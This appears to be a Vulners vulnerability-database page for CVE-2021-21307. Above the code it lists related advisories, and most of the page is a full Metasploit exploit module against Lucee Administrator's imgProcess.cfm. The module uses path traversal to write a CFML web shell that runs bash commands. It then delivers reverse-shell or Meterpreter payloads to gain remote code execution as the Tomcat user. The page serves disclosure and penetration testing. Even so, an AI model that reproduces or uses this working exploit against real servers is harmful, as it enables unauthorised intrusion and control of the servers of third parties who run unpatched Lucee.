Vulners
Lucene search
Lucee Administrator imgProcess.cfm Arbitrary File Write
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Lucee Administrator imgProcess.cfm Arbitrary File Write Exploit | 18 Aug 202100:00 | – | zdt |
 | CVE-2021-21307 | 11 Feb 202100:00 | – | attackerkb |
 | CVE-2021-21307 | 11 Feb 202122:54 | – | circl |
 | Lucee Server Authorization Issues Vulnerability | 11 Feb 202100:00 | – | cnnvd |
 | CVE-2021-21307 | 11 Feb 202118:20 | – | cve |
 | CVE-2021-21307 Remote Code Exploit in Lucee Admin | 11 Feb 202118:20 | – | cvelist |
 | Lucee Administrator imgProcess.cfm Arbitrary File Write | 17 Aug 202117:42 | – | metasploit |
 | Lucee Admin - Remote Code Execution | 2 Jun 202610:14 | – | nuclei |
 | CVE-2021-21307 | 11 Feb 202119:15 | – | nvd |
 | Lucee < 5.3.5.96, 5.3.6.x < 5.3.6.68, 5.3.7.x < 5.3.7.47 RCE Vulnerability (GHSA-2xvv-723c-8p7r) - Version Check | 11 Jun 202100:00 | – | openvas |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Lucee Administrator imgProcess.cfm Arbitrary File Write',
'Description' => %q{
This module exploits an arbitrary file write in Lucee Administrator's
imgProcess.cfm file to execute commands as the Tomcat user.
},
'Author' => [
'rootxharsh', # Discovery and PoC
'iamnoooob', # Discovery and PoC
'wvu' # Exploit
],
'References' => [
['CVE', '2021-21307'],
['URL', 'https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020-cve-2021-21307/7643'],
['URL', 'https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r'],
['URL', 'https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md']
],
'DisclosureDate' => '2021-01-15', # rootxharsh and iamnoooob's writeup
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'], # TODO: Windows?
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false, # Tomcat user
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 8888
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
# /opt/lucee/server/lucee-server/context/logs/application.log
# /opt/lucee/web/logs/exception.log
IOC_IN_LOGS,
# /opt/lucee/web/temp/admin-ext-thumbnails/__/
# /opt/lucee/web/temp/admin-ext-thumbnails/__/../../../context/[a-zA-Z0-9]{8,16}.cfm
ARTIFACTS_ON_DISK
]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/lucee'])
])
register_advanced_options([
OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])
])
end
def check
# NOTE: This doesn't actually write a file
res = write_file(rand_text_alphanumeric(8..16), nil)
return CheckCode::Unknown unless res
unless res.code == 500 && res.body.include?("key [IMGSRC] doesn't exist")
return CheckCode::Safe
end
CheckCode::Appears('Lucee Administrator imgProcess.cfm detected.')
end
def exploit
print_status("Writing CFML stub: #{full_uri(cfml_uri)}")
unless write_cfml_stub
fail_with(Failure::NotVulnerable, 'Failed to write CFML stub')
end
print_status("Executing #{payload_instance.refname} (#{target.name})")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end
def write_cfml_stub
# XXX: Create /opt/lucee/web/temp/admin-ext-thumbnails/__/
res = write_file('/.', '')
# Leak directory traversal base path from 500 response
unless res&.code == 500 && %r{file \[(?<base_path>.*?/__/)\.\]} =~ res.body
return false
end
register_dir_for_cleanup(base_path)
cfml_path = "/../../../context/#{cfml_filename}"
res = write_file(cfml_path, cfml_stub)
return false unless res&.code == 200
register_file_for_cleanup(normalize_uri(base_path, cfml_path))
true
end
def execute_command(cmd, _opts = {})
vprint_status(cmd)
res = send_request_cgi({
'method' => 'POST',
'uri' => cfml_uri,
'vars_post' => {
cfml_param => cmd
}
}, datastore['CmdExecTimeout'])
return unless res
fail_with(Failure::PayloadFailed, cmd) unless res.code == 200
vprint_line(res.body)
end
def write_file(name, contents)
opts = {
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/admin/imgProcess.cfm')
}
opts['vars_get'] = { 'file' => name } if name
opts['vars_post'] = { 'imgSrc' => contents } if contents
send_request_cgi(opts)
end
def cfml_stub
# https://cfdocs.org/cfscript
# https://cfdocs.org/cfexecute
<<~CFML.gsub(/^\s+/, '').tr("\n", '')
<cfscript>
cfexecute(name="/bin/bash", arguments=["-c", "#form.#{cfml_param}#"]);
</cfscript>
CFML
end
def cfml_uri
normalize_uri(target_uri.path, cfml_filename)
end
def cfml_param
@cfml_param ||= rand_text_alphanumeric(8..16)
end
def cfml_filename
@cfml_filename ||= "#{rand_text_alphanumeric(8..16)}.cfm"
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Aug 2021 00:00Current
0.7Low risk
Vulners AI Score0.7
CVSS 27.5
CVSS 3.18.6 - 9.8
EPSS0.92058